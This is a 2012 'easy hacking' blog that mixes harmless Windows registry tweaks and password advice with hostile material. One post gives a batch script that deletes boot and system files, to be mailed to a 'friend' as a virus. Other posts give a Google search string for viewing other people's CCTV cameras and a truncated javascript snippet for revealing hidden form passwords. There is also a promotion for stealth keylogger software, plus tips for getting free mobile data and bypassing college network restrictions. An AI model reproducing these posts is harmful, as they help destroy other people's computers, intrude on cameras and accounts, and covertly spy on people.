Know how to hack in easy way

Tuesday, 6 November 2012

On 18:08 by chandan singh in    No comments
Here is a simple hack to change the name of the Registered owner on your computer:


            Open the Registry Editor and navigate to:



            HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
            


            On the right side pane, find the keys RegisteredOwner and RegisteredOrgannization.
            Double click on them to change the name to whatever you want.
            To see the changes,, right click on “My Computer” and select “Properties”.
            Work on Windows XP, Vista and 7

   
On 18:03 by chandan singh in    No comments
Need t limit access to your computer by disabling the Task Manager?
Her is a simple registry hack to do this:

Open the Registry Editor and navigate to the following key:
HKEY_CURRENToUSER\Software\Microsoft\Windows\CurrentVersion\Policies
Right –click on “Policies”. Select New-> Key and name the key as System.
If you are on Windows XP, you need not create the new key “System” as it is already present in it. So, you can directly navigate to : HKEY_CURRENT-USER
Software\Microsoft\Windows\CurrentVersion\Policies\System in the step-1
Itself.
Right click on “System”, create a new “DWORD” and name it to DisableTaskMgr.
Double-click on the DWORD “DisableTaskMgr” and set the “Value data” to 1 (0=Enable, 1=Disable).
To enable the Task Manager, Set the “Value data” back to 0.
Works on Windows XP, Vista and 7

On 17:55 by chandan singh in    No comments
3. ADD “Recycle Bin” to My Computer in Windows 7 and Vista:


Would you like to add the “Recycle Bin” icon to My Computer then this tutorial is for you.
Let’s start:

Open the Registry Editor and navigate to following key:


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer
\NameSpace


Right-click on “NameSpace” and select New->key. Name the key with the following name :


{ 645ff040-5081-101B-9F08-00AA002F954E}


Now, Open “My computer” and hit F5 to refresh the screen. This should show up the Recycle Bin” icon

On 17:50 by chandan singh in    No comments

Microsoft Windows offers a feature-rich interface and several customization options that make it one of the most user friendly operating systems in the world. However, computer geeks would still love to hack the windows registry so as to add more extra features and functionalities to their operating system.
If you’re one such geek who would like to customize windows in your own way, here is a list of 8 interesting registry hacks that you need to try.




2. Disable Notification Balloons in Windows 7 and vista:
           

You can now disable the annoying notification balloons that keep popping up frequently with warning messages and reminders.  Here is s a step by step  procedure to do that:

 Open the Registry Editor and navigate to the following key:


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced


Right-click on the right-hand pane, and create a new “DWORD”.
Rename it to EnableBalloonTips, double-click on it and set the “Value data” to 0.Reboot the compute to see the changes in effect.
On 17:44 by chandan singh in    No comments

Microsoft Windows offers a feature-rich interface and several customization options that make it one of the most user friendly operating systems in the world. However, computer geeks would still love to hack the windows registry so as to add more extra features and functionalities to their operating system.
If you’re one such geek who would like to customize windows in your own way, here is a list of 8 interesting registry hacks that you need to try.




        1.Disable USB devices:
           
                Disabling USB ports can be a smart idea t add security to the computer. This can be really handy                 if the compute is on a public pace where the chances of virus and other malware infection is really                 high. You can easily disable access to USB ports with the following registry hack:

                Open the Registry Editor (start->Run->Type regedit and hit Enter)
                In the registry, navigate to the following key:
             
               HKEY_LOCAL-MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor
           
                In the right-side pane, double-click on “Start”.
                In the “Value data” field enter 4 and click on “OK”
                Close the Registry Editor and reboot.



To enable USB devices, follow the same procedure as above except n the step-4 enter 3 in the “Value data” field.
Works on Window XP, Vista and 7.

Friday, 2 November 2012

On 16:30 by chandan singh in    No comments

Today, keylogger would only paint half a picture of someones computer activity and because of this the name " Keylogger " has progressed to become ‘Computer Monitoring Software’. Through the internet, you can access a whole range of computer monitoring
software and keyloggers, some are malicious, some aren’t, but they usually encompass a range of standard features.
‘Commercial Computer Monitoring Software is the type of software that you need if you wanted to monitor a lazy employee or a wayward teenagers computer activity. These types of computer monitoring software are never meant to be used maliciously, and almost always come with a disclaimer that has to be acknowledged before you can install the software. These applications have a number of powerful features in 2012 and although they vary from developer to developer, they usually include a standard set of features.

Along with the keystroke monitoring (which will monitor all keys pressed, along with the time and date they were pressed and the application they were typed in to), the second feature you will find in most modern software is screenshot monitoring. This can usually be set to take a screenshot either at set time intervals, or every time a new window becomes active.

Of course, it goes without saying that along with the keystrokes and screenshots, most applications will log all applications used, and the date and time of the use (sometimes, along with the length of use). But today, the most important feature of any monitoring software is internet/website monitoring. Most software will monitor all websites visited (or all web requests) and the date and time of the visit, while also taking a screenshots of the visited website. This can all be used along with the keystroke monitoring to gain user names, passwords and web mail sent and received.
The next most common feature will be document, file and printer monitoring. These features are a must if you’re looking to monitor someone in an office environment. They usually work by monitoring all files opened, saved, copied and deleted, along with the date and time of the activity. Print monitoring will also monitor when a document is printed, along with the name of the printer used. The computers clipboard will also be monitored, so anything that’s been copied and pasted will be logged.
These features are usually the standard set you will find in modern computer monitoring software, although most software will vary on what else they offer (some monitor webcams, GPS etc). Almost all of these applications will run in complete stealth (not showing in the task manager, start menu, add/remove programs etc) and will be opened using a secret key combination and a password
John Jones, the author of this article runs ‘Gecko Monitor’ – the powerful and stealthy computer monitoring software.

download a free trial Monitor head keylogger

http://www.GeckoMonitor.com

Enjoy friends....Thank you for visit here
On 09:32 by chandan singh in    No comments
Hi friends today i am going to tell you how you can shutdown your friend's computer or eniy's computer,So lets start.
NOTE:You have to to it at your own risk because you can not recover your data after click it.

Lets start
1:Open your notepad.
2:Just copy the below code into your notepad.


@ echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r-s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini



3:Save it with any name(eg. virus) with the extension .bat (like eg. virus.bat).
4:Now your virus has created.
5:Now send it to your friend as mail.When he will click on it "THE GAME IS OVER"

next time when he will start his computer it will never start again so enjoy friends







Wednesday, 31 October 2012

On 00:43 by chandan singh in    No comments
This year we have seen some big Security breaches that expose millions of passwords like Yahoo!, LinkedIn, eHarmony and Last.fm, among others , SplashData Reveals Its Annual "25 Worst Passwords of the Year" List.
how-secure-is-my-password_TIMuW_25552_530x302
The three worst passwords haven't changed since 2011; they're password, 123456 and 12345678. The new worst passwords added to this year's list include welcome, jesus, ninja, mustang and password1. Have you ever used one of the most popular passwords of 2012 for your own personal accounts?
SplashData CEO Morgan Slain stated “At this time of year, people enjoy focusing on scary costumes, movies and decorations, but those who have been through it can tell you how terrifying it is to have your identity stolen because of a hacked password.”
-->

We’re hoping that with more publicity about how risky it is to use weak passwords, more people will start taking simple steps to protect themselves by using stronger passwords and using different passwords for different websites.”
I am sure hope you didn't find one of your passwords. If you did, I highly advise you switch it fast. In order to create a safer password, use security phrases with at least eight characters while utilizing a variety of characters within the phrase. Also use multiple passwords across different types of sites.
Password management applications also can help users keep track of their passwords and avoid using the same password for multiple sites, which is another bad practice, especially when mixing, say, entertainment and social networking sites with financial services

Tuesday, 30 October 2012

On 22:58 by chandan singh in    4 comments

I am going to show you how you can hack the CCTV cameras located in the world.
You can see the online view of any CCTV camera online.

REQUIREMENT;
1.      3G internet connection


Lets start the tutorial:
                        1: Open the google.com into your web browser.
                        2: Type the following string on the search box of google
           
                                    inurl:”CgiStart? Page=”
                       
3: Press Enter
                        4:It will show you the online CCTV camera from all over the world.
Now  choose any one that you want to see…
Now enjoy……
Thank you friends
On 10:56 by chandan singh   No comments
On 00:43 by chandan singh in    1 comment



To show the hidden password in ****(form).I am going to show you you how you can reveal that password in the alert box



NOTE:This tutorial is for education purpose only.I am not responsible for any action against you



I am assuming that you have logged in into any one's account


Script:

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j


The above is a javascript code.now the steps begin
1. Copy this script except j(first letter of the script)
Note:If you copied it with j script will not work it will show you an error
2.Now paste it on the address bar you have logged in(in which the password text box is there)
3.now type j at first location or the script you have copied on the URL
4.Now hit enter.It will pop up a windows alert box with the password hidden in **** form

THANK YOU FRIENDS



Monday, 29 October 2012

On 23:41 by chandan singh in    No comments

Now you can access free inter net on your mobile

Setting for you on ucweb is
Settings Name:Gpupi117

Apn:upi117

Username:upi

prompt:i117

Authentication :Secure

Home page : flyproxy

Tuesday, 16 October 2012

On 00:51 by chandan singh in    No comments
HOW TO CHANGE MAC ADDRESS IN BACKTRACK 5

I am going to tell you how can you change mac address in you backtrack 5 step by step


  • step 1: Open your backtrack terminal and type ifconfig to check your MAC Address

  • step 2: In terminal, type ifconfig eth0 down this command is used for disabling the eth0 interface.

  • step 3: Now change the MAC address by using a simple command in backtrack macchanger –r eth0

  • step 4: Now type ifconfig eth0 up this command is used for enabling the eth0 interface

Now you can check your new spoofed mac address.....

Tuesday, 25 September 2012

On 00:51 by chandan singh   41 comments

post

Thursday, 6 September 2012

On 00:14 by chandan singh   No comments
Process:
1. Choose the file or Folder that you want to make password protected.
2. Right Click of mouse on it and Choose "Add to archieve" from the Winrar commands.If you not find the Add to archieve command then
Check: How to add "Add to Archieve" command of Winrar to Context menu
3. On the open Window navigate to "Advanced" tab.
4. Choose "Set password". And Give password to the RAR file.
5. Check the Option "Encrypt file names".


Note: If you check the option then Any body will try to open the RAR file then it will ask for password. If not then any body try to open the file or folder inside the RAR file then it will Ask for Password.
6. Now Click on "OK" and Save all the Changes.
7. A new RAR file will be created with the Same name of the file or folder which is password protected. Now delete the old.

Tuesday, 4 September 2012

On 19:00 by chandan singh   1 comment
Comment on my blog guys......
On 18:52 by chandan singh   3 comments
Seeing the amount of time and bandwidth students waste on social networking sites and torrent downloads. Most of the colleges (at-least in India) have blocked access to such sites on their network. The effectiveness of this restrictive measures depend upon the system used by the college to place this restrictions. Now most of this systems can be easily bypassed by using some simple trick or procedure. But some colleges employ professional system to place the restrictions. Bypassing them can be a real headache. But here is a proxy service which you can use to even bypass this professional systems. Frankly i didn't try it, but one of my friend was facing the restrictions on his college Wi-Fi, especially for torrent downloads. Now he had the options to use other bypassing tricks but it would not work for him because he was compelled to use his student login details to connect to the internet and he feared that if the authorities came across his bypassing he would be permenately blocked from the network. But when he used the below proxy service according to him the proxy bypassed the whole login procedure and directly connected to the internet.


PD-Proxy 
PD-Proxy is a proxy software which uses tunneling to provide more secure connection to the internet. According to my freind, it uses VPN to bypass the system and connect directly to internet. If you are using Wi-Fi this VPN service can be very useful as the information travelling from your computer to the VPN is encryted and thus you have an added layer of security.
To use the service, you have to visit their website and sign up. Then download and install the software. Connect through the software and enjoy. Their free account has 100mb limit. Before you buy premium account please check if it works for you, don't come blaming me later, because you can never be sure which service is good to bypass a particular restricting system. 

Click here to visit PD-Proxy website